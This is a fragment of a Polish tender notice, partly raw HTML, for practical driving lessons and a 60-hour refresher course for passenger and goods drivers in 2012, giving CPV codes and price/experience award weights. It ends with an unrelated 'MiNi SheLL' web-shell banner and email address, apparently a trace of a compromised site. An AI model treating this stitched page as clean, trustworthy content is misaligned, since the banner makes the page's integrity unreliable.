Stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu)
Stacja kontroli pojazdów 
Czynności kontrolne na drodze 
Awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych)
Plac manewrowy - przygotowanie do egzaminu
Trasy egzaminacyjne - przygotowanie do egzaminu
Egzamin wewnętrzny

Przewóz osób i rzeczy
Ilość osób	1 osoby 
Ilość godzin dydaktycznych 60 godzin 
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	Kurs dokształcający kierowców przewożących osoby czy też rzeczy powinien obejmować: 
część ogólną, część dodatkową w zakresie przewozu (osób) rzeczy.
Program musi być zgodny z programem określonym w rozporządzeniu Ministra Infrastruktury z dnia 15 kwietnia 2004 r. w sprawie kursów dokształcających. (Dz. U. z 2004 r. Nr 122, poz. 1269)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com